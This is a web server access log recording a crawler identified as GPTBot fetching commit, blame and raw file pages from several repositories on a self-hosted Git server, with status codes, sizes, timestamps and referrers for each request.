"/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10426] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10429] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10433] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 74.7.227.38] [Length 22717] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" +[17/Feb/2026:13:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 74.7.227.38] [Length 22717] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" +[17/Feb/2026:13:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10169] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14875] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2ftemplates" [Client 74.7.227.38] [Length 32887] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" +[17/Feb/2026:13:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:13:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:13:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:13:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:13:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:13:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:13:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 74.7.227.38] [Length 25662] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" +[17/Feb/2026:13:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" +[17/Feb/2026:13:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 74.7.227.38] [Length 25662] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" +[17/Feb/2026:13:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" +[17/Feb/2026:13:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:13:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:13:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:13:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:13:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fstatic" [Client 74.7.227.38] [Length 96584] [Gzip 11.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" +[17/Feb/2026:13:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:13:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" +[17/Feb/2026:13:50:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" +[17/Feb/2026:13:50:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" +[17/Feb/2026:13:50:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" +[17/Feb/2026:13:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:13:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9938] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" +[17/Feb/2026:13:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10475] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11520] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10498] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11487] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html?display=rendered" [Client 74.7.227.38] [Length 14354] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" [Client 74.7.227.38] [Length 12798] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" [Client 74.7.227.38] [Length 10124] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:13:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" [Client 74.7.227.38] [Length 84442] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" [Client 74.7.227.38] [Length 12274] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" +[17/Feb/2026:13:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:50:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11037] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" +[17/Feb/2026:13:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11526] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" +[17/Feb/2026:13:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11008] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" +[17/Feb/2026:13:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 16638] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" +[17/Feb/2026:13:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12239] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10978] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr 